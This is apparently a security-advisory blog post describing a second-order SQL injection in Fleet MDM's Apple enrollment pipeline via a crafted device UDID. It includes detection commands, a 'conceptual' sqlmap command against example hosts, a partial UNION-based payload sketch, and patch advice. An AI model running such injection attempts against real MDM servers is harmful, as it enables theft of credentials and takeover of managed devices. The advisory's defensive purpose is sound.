Listen to this Post
The vulnerability is a second-order SQL injection within Fleet’s Apple MDM pipeline. Exploitation begins when an attacker, possessing a valid SCEP-issued enrollment certificate (mTLS), enrolls a malicious device. During the MDM Authenticate check-in, the attacker sends a specially crafted UDID. Initially, this UDID is stored safely using parameterized queries. However, the vulnerability manifests in the asynchronous worker job. When this worker processes the enrollment data, it retrieves the stored UDID and interpolates it directly into an unsanitized SQL query. Because the database driver is configured with multiStatements=true, the attacker can perform stacked queries, UNION-based injections, and boolean-based blind injections across four simultaneous subqueries. This allows an attacker to move from a safe parameterized insert to a raw, unsafe string concatenation in the background job, effectively bypassing input sanitization.
Platform: Fleet MDM
Version: Prior 4.53.0
Vulnerability: Second-Order SQLi
Severity: Critical
date: 2024-11-26
Prediction: 2024-12-10
Analytics under What Undercode Say:
Check for multiStatements configuration in database connection grep -r "multiStatements=true" /etc/fleet/ Monitor async worker logs for SQL errors during UDID processing journalctl -u fleet | grep -i "sql" | grep -i "udid" SQLMap simulation for second-order injection (conceptual) sqlmap -u "https://fleet.example.com/api/mdm/checkin" --data "UDID=malicious" --second-order "https://fleet.example.com/api/jobs/status" --dbms=mysql --technique=BEUST
Exploit:
An attacker with an enrolled device sends a malicious UDID containing SQL payloads (e.g., ' UNION SELECT ... -- -) during the MDM Authenticate step. The payload is stored in the database. When the async worker fetches this record, it concatenates the UDID into a SQL query, allowing the attacker to execute arbitrary SQL statements, create admin users, or deploy malicious profiles.
Protection from this CVE
Upgrade to Fleet version 4.53.0 or later. If unable to upgrade immediately, disable Apple MDM entirely via the Fleet configuration until the patch is applied. Ensure strict input validation on UDID strings in both the enrollment and worker processes.
Impact
An attacker can exfiltrate sensitive database contents, including user credentials and API tokens. They can also escalate privileges by inserting new admin accounts, modify configuration, deploy malicious profiles to managed devices, or delete critical data, leading to full system compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

